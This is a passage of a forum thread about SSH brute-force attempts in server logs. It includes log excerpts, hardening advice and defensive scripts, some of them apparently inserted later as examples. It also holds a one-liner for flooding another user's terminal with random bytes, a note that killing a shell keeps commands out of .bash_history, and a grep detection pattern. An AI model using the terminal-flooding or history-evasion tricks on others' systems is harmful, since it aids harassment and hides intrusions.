May 24 04:00:50 [sshd] Server listening on 0.0.0.0 port 22.
May 24 13:33:13 [sshd] Did not receive identification string from 67.102.203.251
May 24 13:46:22 [sshd] Invalid user anonymous from 67.102.203.251
May 24 13:46:23 [sshd] Invalid user passwd from 67.102.203.251
May 24 13:46:25 [sshd] Invalid user chuck from 67.102.203.251
May 24 13:46:26 [sshd] Invalid user darkman from 67.102.203.251
May 24 13:46:27 [sshd] Invalid user hostmaster from 67.102.203.251
May 24 13:46:28 [sshd] Invalid user jeffrey from 67.102.203.251
May 24 13:46:30 [sshd] Invalid user loverd from 67.102.203.251
May 24 13:46:31 [sshd] Invalid user eric from 67.102.203.251
May 24 13:46:32 [sshd] Invalid user lauren from 67.102.203.251
May 24 13:46:38 [sshd] Invalid user mark from 67.102.203.251
May 24 13:46:39 [sshd] Invalid user sin from 67.102.203.251
May 24 13:46:40 [sshd] Invalid user richer from 67.102.203.251
May 24 13:46:42 [sshd] Invalid user fluffy from 67.102.203.251
May 24 13:46:43 [sshd] Invalid user gold from 67.102.203.251
May 24 13:46:44 [sshd] Invalid user tomcat from 67.102.203.251
May 24 13:46:46 [sshd] Invalid user cosinus from 67.102.203.251
May 24 13:46:47 [sshd] Invalid user httpd from 67.102.203.251
May 24 13:46:48 [sshd] Invalid user squirrelmail from 67.102.203.251
May 24 13:46:50 [sshd] Invalid user trash from 67.102.203.251
May 24 13:46:50 [sshd] Invalid user kent from 67.102.203.251
May 24 13:46:52 [sshd] Invalid user ace from 67.102.203.251
May 24 13:46:53 [sshd] Invalid user backup from 67.102.203.251
May 24 13:46:54 [sshd] Invalid user fish from 67.102.203.251
May 24 13:46:55 [sshd] Invalid user java from 67.102.203.251
```

and that is a very small snippet! Wow okay... time to bone up on security!

----------

## kitana_ann

If it wasn't for this thread I would not think for a minute that my server was in jeopardy! Here's what I found in my log:

```
May 30 02:04:19 server sshd[18798]: Accepted keyboard-interactive/pam for me from 143.97.2.35 port 18248 ssh2

May 30 02:04:19 server sshd(pam_unix)[18804]: session opened for user me by (uid=0)

May 30 02:04:42 server su(pam_unix)[18818]: session opened for user root by me(uid=1000)

May 30 02:04:50 server su(pam_unix)[18818]: session closed for user root

```

The creepy part is that I am not awake at that time and I don't know whose IP that is. I checked the .bash_history for both root and user and I only see code that I have executed  :Rolling Eyes: . I am soo confused over what happened. Any ideas on where else I could check?

----------

## moocha

 *Karak wrote:*   

> You know, like so many others, I saw this thread and after reading it thought "hrmm... maybe I should look at my sshd logs..." and holy god! Look at this!
> 
> May 24 04:00:50 [sshd] Server listening on 0.0.0.0 port 22.
> 
> May 24 13:33:13 [sshd] Did not receive identification string from 67.102.203.251
> ...

 Er, if you don't look at the logs, why even bother logging at all? Resource hog if they're not used.

----------

## moocha

 *kitana_ann wrote:*   

> If it wasn't for this thread I would not think for a minute that my server was in jeopardy! Here's what I found in my log:
> 
> ```
> May 30 02:04:19 server sshd[18798]: Accepted keyboard-interactive/pam for me from 143.97.2.35 port 18248 ssh2
> 
> ...

 The attacker got root privileges so that machine is completely compromised. I wouldn't trust it for anything anymore. Back up your user data, reformat and reinstall. You also have to assume your account on each and every other machine you've logged on from this machine was compromised, and so on and so forth in a nice chain. Basically, reformat, reinstall, change all your passwords for any purpose (be it email accounts, webmail accounts, various sites, etc etc) from a machine you trust, use strong passwords or no passwords at all (S/Key or PKI authentication), and keep up to date with glsa-check. If the compromised machine or any of the other machines you logged into also has other users, have them do the same if possible, and at least have them change their passwords when logged in from a trusted machine.

As to .bash_history - its value as evidence is zero. Try it for yourself - log into an account, type some commands, kill your shell with

```
kill -9 $$
```

then log in again and check .bash_history. The commands you typed won't be there. The only way to be absolutely sure of what was typed is to have a kernel with a strong security infrastructure, have it log all execs, and have it send logs to a physical line printer - paper printouts at a remote location are quite hard to fake  :Wink: . Such measures are overkill on home machines though, so it's a tradeoff between security and usability, as always.

----------

## Karak

 *moocha wrote:*   

> Er, if you don't look at the logs, why even bother logging at all? Resource hog if they're not used.

 

Of course you're right, I came down with a temporary case of pendejitis... I'll be looking at the log files very closely from now on.

----------

## kitana_ann

Thanx for the tip! I found out who the IP belongs to and it is my job. At my work computer I log into my server. But the weird part is how it could have logged in in the middle of the night. I use the programs putty and filezilla to log in via ssh. Do you guys know any security holes with those programs that could have caused this behavior? I usually only lock my computer when I go home; I will from now on shut it down.

----------

## Karak

Do you save passwords at all on your work computer? Do you use the same password for more than one account?

----------

## kitana_ann

All my passwords are different on every computer/account. Only thing is that I have automatic login in filezilla. The login is for my ordinary user, not root. That makes me wonder how root got logged in?  :Rolling Eyes: 

----------

## Karak

Does someone else use your computer when you're not there?

----------

## kitana_ann

Yes, some users may use my computer. But the only way to get access is to shut down the computer by force and then log in with their account, since I lock my computer. What are you suggesting?  :Confused: 

----------

## Karak

Well even if they have to reboot the machine, the programs installed (PuTTY) are still there and can be accessed. Do you have a profile saved there for your home machine, or do you type in the IP address every time you connect? If you've got a profile saved there, that explains how someone with your work IP knew to connect to your home machine... as to how they got your root password I can't say, but there is always a way...

----------

## kitana_ann

Well I do not have a profile, I always type in the IP address every time. It is really weird.... :Rolling Eyes: 

Hate to reinstall; reinstallation takes time and there is no safety on the net during that time. But I guess that's the price you have to pay if you're not careful. 

Thanx for your post.

----------

## freebies_11

Your fault for naming your user 'me' I would say.

----------

## smurfd

once hacked, consider everything you had on the disk, to be possible threats.

reformat, re-install, beef up security.

----------

## kitana_ann

 *Heelios wrote:*   

> Your fault for naming your user 'me' I would say.

 

I changed my user name when I pasted the text in this post. Also my server isn't named "server".  :Rolling Eyes: 

----------

## cyberb0b

 *kitana_ann wrote:*   

> But the weird part is how it could have logged in in the middle of the night.

 

Maybe your clocks are not correct.  Either that or you have a split personality, because:

 *kitana_ann wrote:*   

> May 30 02:04:42 server su(pam_unix)[18818]: session opened for user root by me(uid=1000)

 

I believe this log statement means the user "me" typed "su" and entered the correct root password.  Either you use really simple passwords, or you have been hacked by the guy on the other side of the mirror.
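A small correlation pass over auth-log lines of the kind kitana_ann posted, added here as an example and not code from the thread: it pairs each `Accepted` login with any `su` the same account performs afterwards, keeps a `su` that has no matching ssh login (a console session, or one whose login record was wiped) as a separate finding, and flags logins outside the hours the account is normally used. That is exactly the reading cyberb0b gives above: a 02:04 login for "me" followed 23 seconds later by a successful su to root. The sample log is constructed (documentation-range addresses, made-up users and PIDs); the line formats are the ones sshd and pam_unix emit, as in the quoted log.

```python
"""Correlate sshd logins with su privilege changes in an auth log, and flag
logins outside the hours the account is normally used."""
import re
from dataclasses import dataclass, field
from datetime import datetime, timedelta

TS = r"^(?P<ts>\w{3} +\d{1,2} \d\d:\d\d:\d\d) \S+ "
ACCEPTED_RE = re.compile(
    TS + r"sshd\[\d+\]: Accepted (?P<method>\S+) for (?P<user>\S+) from (?P<ip>\S+) port \d+")
SU_RE = re.compile(
    TS + r"su\(pam_unix\)\[\d+\]: session opened for user (?P<target>\S+) by (?P<user>[^(\s]+)\(uid=\d+\)")

# Constructed sample (documentation-range addresses, made-up users and PIDs):
# a night-time login that becomes root, a daytime key login that does not,
# an su by a user with no ssh login at all, and a daytime login that becomes root.
SAMPLE_AUTH_LOG = [
    "May 30 02:04:19 server sshd[18798]: Accepted keyboard-interactive/pam for me from 192.0.2.35 port 18248 ssh2",
    "May 30 02:04:19 server sshd(pam_unix)[18804]: session opened for user me by (uid=0)",
    "May 30 02:04:42 server su(pam_unix)[18818]: session opened for user root by me(uid=1000)",
    "May 30 02:04:50 server su(pam_unix)[18818]: session closed for user root",
    "May 30 09:12:07 server sshd[19102]: Accepted publickey for alice from 192.0.2.80 port 50210 ssh2",
    "May 30 11:45:02 server su(pam_unix)[19400]: session opened for user root by bob(uid=1002)",
    "May 30 14:10:31 server sshd[19877]: Accepted keyboard-interactive/pam for me from 192.0.2.35 port 18301 ssh2",
    "May 30 14:10:31 server sshd(pam_unix)[19880]: session opened for user me by (uid=0)",
    "May 30 14:31:55 server su(pam_unix)[19951]: session opened for user root by me(uid=1000)",
]


@dataclass
class Login:
    when: datetime
    user: str
    method: str
    source: str
    escalations: list = field(default_factory=list)  # (time, target user)


def _stamp(m, year):
    """Syslog timestamps carry no year, so the caller supplies it."""
    return datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")


def correlate(lines, year, horizon_hours=8):
    """Attach each su to the most recent ssh login of the same user within
    horizon_hours. Returns (logins, orphan_su), where orphan_su lists su events
    with no such login: console sessions, or logins whose record is gone."""
    horizon = timedelta(hours=horizon_hours)
    logins, orphan_su = [], []
    for line in lines:
        m = ACCEPTED_RE.match(line)
        if m:
            logins.append(Login(_stamp(m, year), m["user"], m["method"], m["ip"]))
            continue
        m = SU_RE.match(line)
        if m:
            when = _stamp(m, year)
            for lg in reversed(logins):
                if lg.user == m["user"] and timedelta(0) <= when - lg.when <= horizon:
                    lg.escalations.append((when, m["target"]))
                    break
            else:
                orphan_su.append((when, m["user"], m["target"]))
    return logins, orphan_su


def outside_hours(logins, start_hour=8, end_hour=18):
    """Logins made outside the interval [start_hour, end_hour) in log-local time."""
    return [lg for lg in logins if not start_hour <= lg.when.hour < end_hour]


def summarize(logins, orphan_su):
    """One human-readable line per login and per unexplained su."""
    lines = []
    for lg in logins:
        esc = ", ".join(f"su to {t} at {w:%H:%M:%S}" for w, t in lg.escalations) or "no su"
        lines.append(f"{lg.when:%b %d %H:%M:%S} {lg.user}@{lg.source} via {lg.method}: {esc}")
    for w, u, t in orphan_su:
        lines.append(f"{w:%b %d %H:%M:%S} su to {t} by {u} with no matching ssh login")
    return lines


if __name__ == "__main__":
    logins, orphans = correlate(SAMPLE_AUTH_LOG, 2005)
    for line in summarize(logins, orphans):
        print(line)
    for lg in outside_hours(logins):
        print("off-hours login:", lg.when, lg.user, lg.source)
```

On a real box the input is `/var/log/auth.log` or `/var/log/messages` (syslog-ng users: whatever the auth facility is routed to), and the first thing to check for each off-hours login is whether the source address and authentication method match how the account is actually used.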

----------

## Freman

I love the sight of people in a panic over their logs saying "Hi, someone tried to log in with this username but failed"

That's all it is folks.

Sure you should beef up your security with port knocking, firewalls, non-default ports, pubkey auth, no-root access, restricted user access. But for the better part as long as it keeps saying "failed" you're fine.

All a firewall does if they're failing is silence your logs.

I myself run scripts that aggregate ip's from mail logs, ftp logs, web logs and sshd logs with various levels of "paranoia"

I also run 2 layer firewalls - a gateway / router running tiny bsd implementation and individual host firewalls on every machine.

* one worm like attack on http results in instant 48 hr block on all firewalls

* three relay rejects on email results in 48 hr block on all firewalls

* three wrong passwords on ssh result in 48 hr block on all firewalls

* bogus data / three wrong logins on ftp result in 48 hr block on all firewalls.

The only time anyone's ever broken in to one of my boxes was way back before I implemented this system and it was an exploit in proftpd that let them in, not ssh.

My firewalls above aren't aimed so much at security, just cutting back the logging.

Still I wouldn't mind being able to run a daemon in front of syslogd to intercept and act on log messages as they happen rather than in cron...

Something I tell my users: Face it, there's heaps of bogus traffic running around on the internet, 99% of it can be safely ignored if you are using basic security procedures and common sense. No point harping up every time a login fails.

----------

## moocha

 *Freman wrote:*   

> All a firewall does if they're failing is silence your logs.

 Wrong.

----------

## linuxgeekery

Hmmm... from bcore's logs it seems that the hacker is tricky. To host his IRCBot, virus, what ever it is  :Razz: , he uses free hosting sites using subdomains. 100free.com, netfirms, etc. When you do a whois, it tells you about the hosting site, not the subdomain

----------

## linuxgeekery

Wait a fcking second...

I got someone trying to get at my box from the same ip 131.234.36.152! And what's special is it was on my Winblows box. Yes, I still have one (for a tad of gaming  :Razz: )

----------

## darker

Starting from the beginning of April there have been 5517 attempts on my machine.  None have gotten through.

----------

## CptPajamas

i've been using xinetd and tcp wrappers to secure SSH access exclusively from trusted IP ranges / IP's.

hosts.allow and hosts.deny with appropriate /etc/services entries is king.

----------

## edudlive

I don't have sshd running  :Smile: , I'll check my server.

Doesn't seem it has had any attempts to gain access other than my friend using my FTP

----------

## moocha

 *darker wrote:*   

> Starting from the beginning of April there have been 5517 attempts on my machine.  None have gotten through.

 That you know of  :Wink: .

</UtterParanoia>

Sorry, couldn't help myself  :Very Happy: .

----------

## Varg_

As of this morning I have had a little over two million ping, connection, and login attemps on my server.....and zero logins  :Smile: 

----------

## Oid

16,500 attempts in the last few months on one of the boxes here (the only one on 22).... Initially it was your standard test/guest/admin, etc. attempts, then progressed on to bruteforcing the root password, and finally has now moved on to a dictionary list of names being tried.

----------

## dake.cdx

Install this to quickly get rid of dictionary attempts: 

http://fail2ban.sourceforge.net

I installed this on my server and it works perfectly by adding the faulty IP in iptables for 10 minutes (the attack script will then time out and move to the next IP).

----------

## christsong84

 *dake.cdx wrote:*   

> Install this to quickly get rid of dictionary attempts: 
> 
> http://fail2ban.sourceforge.net
> 
> I installed this on my server and it works perfectly by adding the faulty IP in iptables for 10 minutes (the attack script will then time out and move to the next IP).

 

I use that too...though I haven't had many attempts lately...I think most of them gave up except the automated scripts randomly hitting our ip  :Razz: 

----------

## dake.cdx

 *Quote:*   

> I use that too...though I haven't had many attempts lately...I think most of them gave up except the automated scripts randomly hitting our ip

 

Did you try to reverse the IPs ? About 90% of the banned IPs are from Asia (Korea, China, Japan), I'm still wondering why there are so many attempts from these countries.

----------

## moocha

 *dake.cdx wrote:*   

> About 90% of the banned IPs are from Asia (Korea, China, Japan), I'm still wondering why there are so many attempts from these countries.

 Easy - it's because those countries have undertaken building a highly available broadband infrastructure targeted at average consumers. In other words, Big Pipes and Inexperienced Admins.

----------

## bitwise

 *dake.cdx wrote:*   

> Install this to quickly get rid of dictionary attempts: 
> 
> http://fail2ban.sourceforge.net
> 
> I installed this on my server and it works perfectly by adding the faulty IP in iptables for 10 minutes (the attack script will then time out and move to the next IP).

 that looks nice, but does it have any 'whitelist' features? I believe there have been a few of utils like this, but a lot of them could be tricked into blocking certain known good machines (say, DNS) by spoofing their ip.

of course, the time limit makes this a little less of a problem.

----------

## christsong84

 *dake.cdx wrote:*   

>  *Quote:*   I use that too...though I haven't had many attempts lately...I think most of them gave up except the automated scripts randomly hitting our ip 
> 
> Did you try to reverse the IPs ? About 90% of the banned IPs are from Asia (Korea, China, Japan), I'm still wondering why there are so many attempts from these countries.

 

I reverse the IPs and e-mail for each IP to the ISP in charge of them and ask for investigation...most of the time nothing gets done.  However I've really only had about 1/5th of my attacks coming from Asia (the last one came from a high school...I was amused and e-mailed the school (Korea))...I had one come from Germany....but over 1/2 for me are in the US...comcast users  :Razz: 

----------

## Proton

Well, my computer is getting probed by Pakistani bots... ugh...

 *Quote:*   

> Jun 11 15:27:47 [sshd] Invalid user test from 202.163.126.42
> 
> Jun 11 15:27:51 [sshd] Invalid user admin from 202.163.126.42
> 
> Jun 11 15:27:53 [sshd] Invalid user admin from 202.163.126.42
> ...

 

I think I'll just finally get at it and install a firewall. And just block everything outside of Europe.

----------

## christsong84

changing the ports, while not that effective against real hackers...is great against bots  :Smile: 

I actually don't get any hits on my new ssh port ^_^

----------

## foofoo

 :Twisted Evil:   :Shocked:   :Laughing: 

----------

## vorok

For those of you who don't have anything better, here's the script I use to parse through my sshd logs.

```
#!/bin/bash
# Looks for suspicious activities within the ssh logs in /var/log/sshd
# and mails the matching lines to root.

logFile='/var/log/sshd/current'
grepString='(Invalid)|(BREAKIN)|(AllowGroups)'

# Only send mail when there is something to report (-q just tests for a match).
if egrep -q "$grepString" "$logFile"
then
        egrep "$grepString" "$logFile" | /usr/sbin/sendmail -i -f root -bm sshdMonitor@localhost
fi
```

Make a daily cronjob out of it and it will e-mail you once a day if there are any intrusion attempts (Non-existent users, unable to reverse map, or user not in AllowGroups).  The output is a bit lengthy if you get 100+ per day, but it is nice to know that if you aren't getting any mail then you are probably safe.

BTW, those of you who don't already, limit your ssh logins to AllowUsers or AllowGroups (I have a 'remote' group, anyone not in it does not get in) and make sure that root cannot ssh into your box.

----------

## Diezel

Combining a little iptables script with cron and grep should be quite useful.

I wrote a script with the help of the Linux Server Hacks book and the help of this forum.

Now the only thing we need is a cron that gets the IPs of attackers, echoes them to /etc/blacklist and reruns the script to deny them access; grep should work fine. It would be interesting to see why they were rejected, so the script should also add something to the blacklist, like "failed login ssh 5 times". And why not go through snort logs as well.

I'm not that good at scripting but if someone is to do this it would be nice.

The script can be found at http://www.nixadmins.net/downloads

// Mats

----------

## memoi2001

My box is running behind a hardware firewall with its default policy denying everything,

bit of a bitch to set up when you add anything but it's the most secure way of doing things.

add to that ssh on a non-default port, dynamic IP, non-dictionary based usernames and passwords and no unnecessary daemons running...

rock solid security, even I can't get in half the time  :Wink: 

----------

## Adrien

 *electric_hamster wrote:*   

>  *kalisphoenix wrote:*   I'm sure that there's some way to fuck someone up over ssh.  I mean, the connection goes both ways, right? 
> 
> Doesn't actually fuck them up, but I've used it a few times on people who've annoyed me:
> 
> ```
> ...

 

I'm pretty curious about what it does exactly??? Anyone knows?  :Smile: 

----------

## menetto

Does a program exist to test the passwords of your users in a system? If they are vulnerable for a dictionary attack, etc.

----------

## nephros

 *menetto wrote:*   

> Does a program exist to test the passwords of your users in a system? If they are vulnerable for a dictionary attack, etc.

 

the canonical tool for this is called "John the Ripper":

emerge app-crypt/johntheripper

----------

## zx2c4

Just this morning I noticed in my /var/log/messages that I was getting many break in attempts. To make it easier,

```
sudo cat /var/log/messages | grep sshd | less
```

That's when I decided to change the default port away from 22 for sshd by

```
sudo nano -w /etc/ssh/sshd_config
```

Then changing the appropriate param.

Do you guys think a different port is enough or should I install knockd?

----------

## mikkoloo

Here is my little story, guess it applies to this thread. Got this attempt tonight. Thinking of reporting it.

Attempt at an ssh shell.

I post some logs and an xtraceroute pic, enjoy  :Smile: 

www.miccet.info/hack

----------

## nevynxxx

 *zx2c4 wrote:*   

> 
> 
> ```
> sudo cat /var/log/messages | grep sshd | less
> ```
> ...

 

```
[sudo] grep sshd /var/log/messages [| less]
```

Why invoke cat when grep is *designed* to parse files?

----------

## lixer

I just went through my log files and found several crack attempts against my box.

I just set up this box over the past weekend. Script kiddies are already trying to break in. Arrgghhhh script kiddies. 

Guess it's time to set up a firewall.

By the way, here is a list of the crackers' IPs:


What's a simplest yet effective firewall to setup?

----------

## nhaggin

 *Quote:*   

> I'm pretty curious about what it does exactly??? Anyone knows? 

 

It grabs bytes from the kernel's random number generator and dumps them to the terminal of the user specified in the argument to write(1); in this case, the guy trying to hax0r you over ssh. There is actually a small typo; it should be 

```
cat /dev/urandom | write $USER
```

instead.

----------

## kalisphoenix

Good times.  I'm working on securing my server (Sun Ultra 10).  I figure it's safe from binaries, but the perl scripts that can be run through PHP vulnerabilities scare me.  (Keep in mind that I'm not a programmer, so if I just said something stupid, forgive me)

So I'm working on getting SELinux, UML, and a few other things (a nice partition table, /etc/securetty tightening, disabling unneeded SUIDs, disabling module loading in the kernel) installed this time around.  I'm using the Gentoo Hardened, Gentoo SELinux, Gentoo UML, and some other handbooks/wiki entries as my bibles.  I figure I'll install a base system with these tricks, really tighten up the OS and get rid of everything that isn't absolutely necessary for the base system, and then do my apache'ing et cetera from a UML.  Does that make good sense?

Good hint on the fail2ban prog.  I'll certainly install that too. 

Does anyone have any new (since this thread kinda died) suggestions for tightening security that AREN'T in the handbooks/guides I've listed above?

I'm considering disabling the root password entirely and doing everything through sudo, since I've gotten used to not having a root user on OS X.  Anyone done this?  Does it bork the bloody hell out of your system?

Hmm... maybe I should search...

----------

## insomniac

Today I checked my logs and found a lot of invalid login attempts. since I use SSH from work and it goes through proxy servers and stuff (I work at HP) I decided the best way was to change to public key authentication. Took me 5 minutes - done... I feel a little more secure now 8)

----------

## segedunum

Can anyone tell me why on Earth anyone is running a damn SSH server publicly?! For goodness sake, if you need admin access to your server outside then install yourself a damn VPN to do it such as OpenVPN or an IPSec one.

If you're behind a firewall that restricts outgoings and blocks VPN connections then I could understand, but that's not very likely, and even then, it would have to allow SSH to get remote access. If you're in that position then you have to make a serious, considered decision about whether it's worth the risk to remote admin your server through a publicly available SSH service running on it. If you're having to consider configuring your firewall to disallow bots coming from Pakistan or somewhere else, talking about portknocking, worrying about totally securing your passwords or you're having to parse your logs like crazy as a knee-jerk reaction then you're simply never going to get ahead. I can get full remote access to my server but there are no dodgy unsuccessful SSH logins in my logs  :Wink: .

Sorry, but I think anyone who runs anything publicly like this is just plain silly - and I'm being polite there.

----------

## LostControl

Maybe you could try Fail2Ban. It will allow you to have an external access to your SSH server and will block script kiddies trying to break in  :Wink:  It runs on my home server and blocks 3-4 attempts a day.

Ebuilds are available on the website or in bugzilla.

----------

## christsong84

 *segedunum wrote:*   

> Can anyone tell me why on Earth anyone is running a damn SSH server publicly?! For goodness sake, if you need admin access to your server outside then install yourself a damn VPN to do it such as OpenVPN or an IPSec one.
> 
> If you're behind a firewall that restricts outgoings and blocks VPN connections then I could understand, but that's not very likely, and even then, it would have to allow SSH to get remote access. If you're in that position then you have to make a serious, considered decision about whether it's worth the risk to remote admin your server through a publicly available SSH service running on it. If you're having to consider configuring your firewall to disallow bots coming from Pakistan or somewhere else, talking about portknocking, worrying about totally securing your passwords or you're having to parse your logs like crazy as a knee-jerk reaction then you're simply never going to get ahead. I can get full remote access to my server but there are no dodgy unsuccessful SSH logins in my logs .
> 
> Sorry, but I think anyone who runs anything publicly like this is just plain silly - and I'm being polite there.

 

My servers are co-located 3 stories below ground on the other side of town.  I sign in from the office for daily maintenance and checks.  It's not on its own network so I don't set up a VPN connection...SSH does the job just fine for me.  Like I've said before, only bots have hit my servers so changing the port seemed to do the trick.  :Smile:   (and the whole key based logins and such other obvious procedures  :Smile:  )

----------

## alex6z

I have (an) open account(s) on my system. I put them there to see who would login and wait and see what they try to do.  I just don't get why people are so scared.  They shouldn't be able to get root access from the account.  I have it set up with limits and outgoing firewall so they can't use an IRC bot.  So far nothing too interesting has happened .  

2005-07-19 my dynamic IP is ssh://admin@12.223.170.28/  try it out.  I know it's risky allowing anonymous shell access, but it's still safer than windows and I really don't care anyway, computers are just toys for me  :Smile: 

----------

## nhaggin

 *Quote:*   

> Can anyone tell me why on Earth anyone is running a damn SSH server publicly?! For goodness sake, if you need admin access to your server outside then install yourself a damn VPN to do it such as OpenVPN or an IPSec one.

 

The simple fact is that running any service whatsoever, on any port, is a security hazard. The only truly secure network is the one you don't build, and the only truly secure computer is in a concrete bunker, under armed guard, with console access only, etc. Even then, there are various points of attack one could use to gain access, if one really wanted to.

It is currently fashionable for 1337 $cr!p+ k!ddi3z to hit systems running SSH. Security-compromising errors have been found before in ipsec-tools, and if one wanted one could probably attempt to mount an attack against IPSec. OpenVPN is a great piece of software (I use it extensively), but I'm sure that a programming error will slip in at some point and that an attack could be devised against it. But for right now, SSH is a far more inviting target: so many more people use it, and there is a much simpler method of attack if the admin has open accounts on his box.

----------

## red-wolf76

Strange behaviours on my home network tonight, dudes...

Ok, so I got a nice little home network going at my place which my girl-friend, her parents and I use (yeah, I know it's corny to live in with the Ps but hey, it saves rent!). Topology is as follows:

```
Router ------------ Parents PC (WinXP)
|
Switch ------------ Girl-friend's PC (Gentoo 2.6.12-r6)
|------------------- My PC (Win2000)
|------------------- Bragi (D-Link Printer Server)
\--- Balder (Wireless Bridging Access Point) ---)) ((--- Asgard (WBAP)
```

Asgard is connected to another switch and two more boxen are hooked onto there, "dagon" and "nyarlathotep" which are also running Gentoo. The router does have an inbuilt "firewall", but some ports are mapped to the different boxen for direct Messaging connections. And some online gaming stuff (AAO, mostly but only to the Win2000 box). The router (and modem) is a German Zyxel Prestige 660HW with the "Arcorized" firmware, since we got it from Arcor, our DSL-Provider.

Now tonight (I'm not at home, mind you) I get a call from my gf that computers are behaving strangely. First of all, she got a window telling her "Just looking in. The boring guy!" (written in German, though!) which according to her description looks much like a simple X-Window. Then she panics and shuts down her Linux box but it starts up again, as does my Win2000 box (which was off in the first place!). However - she claims - my box kept shutting down again and trying to rise a couple of times. So I tell her to take the router off-line by turning off the power for it and the magic stops.

Now, I'm not in a position to verify all this, but I've no reason to believe she's lying. What has happened? Possible suspect for this is a guy who turned annoying on ICQ (she uses GAIM for that and YAHOO! on her box) and got told off by her.

Conclusions according to current knowledge:

1.) The guy came in over the router. Weird stuff stopped when it got downed, so I guess my wireless bridge is more or less secure still...  :Confused: 

2.) Possibly he gained access to my gf's box, which runs the latest "x86" GAIM on top of Gentoo (2.6.2-gentoo-r6 kernel)  :Shocked: 

3.) He probably was able to send wake-on-lan packets to muck with the other boxen on the network  :Embarassed: 

4.) I need to secure my network better. ASAP!  :Evil or Very Mad: 

What was going on? Since I wasn't there to witness the whole event, I'm a bit skeptical about it all, but concerned nonetheless. I do fear that whoever was sending on-screen messages got root access though (which my gf doesn't have, even though the account can do "su".) so I'll be reading up on security a bit more than I was.

Are there any known vulnerabilities in GAIM that attackers can use to hijack a box in this manner?

It makes for a funny story, actually, but does anyone have a suggestion? Thanks for the time and don't bother trying not to laugh. Hell, even I had to chuckle about it...  :Laughing: 

----------

## alex6z

The thing is, when you make your box public, it defeats the point of hacking it. What's the point if the person you're hacking doesn't care? Go hack your own box!

----------

## lbrtuk

 *alex6z wrote:*   

> The thing is, when you make your box public, it defeats the point of hacking it. What's the point if the person you're hacking doesn't care? Go hack your own box!

 

That's all well and fine until your machine is being used as a spam relay, being used as a ddos drone, or is set up to relay child porn / stolen credit card numbers etc.

----------

## jamapii

 *red-wolf76 wrote:*   

> Then she panics and shuts down her Linux box but it starts up again, as does my Win2000 box (which was off in the first place!). However - she claims - my box kept shutting down again and trying to rise a couple of times.

 Some other box besides hers might be infested. Something must have sent those wake-on-lan packets.

 *Quote:*   

> (she uses GAIM for that and YAHOO! on her box)

 gaim had some security issues recently, possibly it's not over yet

 *Quote:*   

> 1.) The guy came in over the router. Weird stuff stopped when it got downed, so I guess my wireless bridge is more or less secure still... 

 WPA is generally considered OK, but I prefer openvpn.

The simple X window could be the Windows Message Service (if enabled in /etc/samba/smb.conf - it's "message command") (it is used in Windows to pop up windows with spam).

----------

## red-wolf76

 *jamapii wrote:*   

>  *red-wolf76 wrote:*   Then she panics and shuts down her Linux box but it starts up again, as does my Win2000 box (which was off in the first place!). However - she claims - my box kept shutting down again and trying to rise a couple of times. Some other box besides hers might be infested. Something must have sent those wake-on-lan packets.

 I'll check for that. Are there any good tools for finding out if your box has been rooted or otherwise infected?

 *Quote:*   

>  *Quote:*   (she uses GAIM for that and YAHOO! on her box) gaim had some security issues recently, possibly it's not over yet

 I'll turn off the direct connections for now. That ought to stop the most obvious POE.

 *Quote:*   

>  *Quote:*   1.) The guy came in over the router. Weird stuff stopped when it got downed, so I guess my wireless bridge is more or less secure still...  WPA is generally considered OK, but I prefer openvpn.

 I'm not sure the APs are capable of that, but I'll have a look.

 *Quote:*   

> The simple X window could be the Windows Message Service (if enabled in /etc/samba/smb.conf - it's "message command") (it is used in Windows to pop up windows with spam).

 Ah, that'll go too then, if it is installed. I do use a SMB-utility to access the Win2K file shares when necessary.

Thanks for the pointers. I'm itching to get home and have a look.

----------

## Zepp

The package chkrootkit will try and look for installed rootkits, if they did that. Not sure otherwise how you can tell, other than to watch it carefully, or unless they didn't erase some logs :/

----------

## jamapii

 *red-wolf76 wrote:*   

> I'll check for that. Are there any good tools for finding out if your box has been rooted or otherwise infected?

  ... and rkhunter.

 *Quote:*   

>  *Quote:*   WPA is generally considered OK, but I prefer openvpn. I'm not sure the APs are capable of that, but I'll have a look.

 Recent APs should be capable of WPA, but openvpn is usually only done by computers. (client(s) <-> server)

----------

## red-wolf76

 *jamapii wrote:*   

>  *red-wolf76 wrote:*   I'll check for that. Are there any good tools for finding out if your box has been rooted or otherwise infected?  ... and rkhunter.
> 
>  *Quote:*    *Quote:*   WPA is generally considered OK, but I prefer openvpn. I'm not sure the APs are capable of that, but I'll have a look. Recent APs should be capable of WPA, but openvpn is usually only done by computers. (client(s) <-> server)

 Thanks for the pointers. Neither rkhunter nor chkrootkit found any abnormalities on the supposedly affected system. I do have root login over ssh enabled, but only from LAN IPs (if God is indeed merciful and my config correct) however so I can muck about on the box from my PC when my gf uses it.  :Embarassed: 

So far the guy hasn't turned up again, so if I don't find anything on the other boxen, I'll check it off as a (probably relatively harmless) "sK1Rp7-K1Dd3e"-Intrusion along the lines of "Behold my mighty sexual prowess as I make your computer start up using a packet!"  :Confused: 

Or it's all urban legend, I didn't witness the incident after all...  :Rolling Eyes: 

P.S.: The APs are WEP-enabled. D-Link has issues using WPA in Bridge Mode - God knows why!  :Crying or Very sad: 

----------

## Zepp

Don't enable direct root login for ssh, just add whatever user you want, like yours, to the wheel group and then login to that user via ssh and su to root.
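A check for the settings Zepp's advice rests on, added here as an example and not taken from the thread. It reads an sshd_config the way sshd_config(5) says sshd does: keywords are case-insensitive, `#` starts a comment, `Keyword=value` is allowed, and for each keyword the first value in the file wins, so a hardened "PermitRootLogin no" appended at the bottom of a file that already says "PermitRootLogin yes" higher up changes nothing. The sample config, the function names and the choice to audit only PermitRootLogin and PasswordAuthentication are assumptions of this example.

```shell
#!/bin/sh
# Added example (not from the thread): report weak PermitRootLogin /
# PasswordAuthentication settings in an sshd_config, honouring sshd's
# first-match-wins rule for the global section.

# Constructed sample config showing the trap: the late "PermitRootLogin no"
# is ignored, and the Match block and comments must not affect the result.
SAMPLE_CONFIG='# /etc/ssh/sshd_config (constructed sample)
Port 22
permitrootlogin yes        # set years ago
PasswordAuthentication=yes
AllowGroups wheel
Match User backup
    PasswordAuthentication no
PermitRootLogin no         # added later, has no effect'

# sshd_effective KEYWORD  < sshd_config
# Prints the value sshd uses for KEYWORD in the global section, or nothing
# if the keyword is unset there (the compiled-in default then applies).
# Match blocks are conditional and out of scope, so parsing stops at "Match".
sshd_effective() {
    awk -v want="$(printf '%s' "$1" | tr 'A-Z' 'a-z')" '
        { sub(/#.*/, "") }                   # strip comments
        tolower($1) == "match" { exit }      # end of the global section
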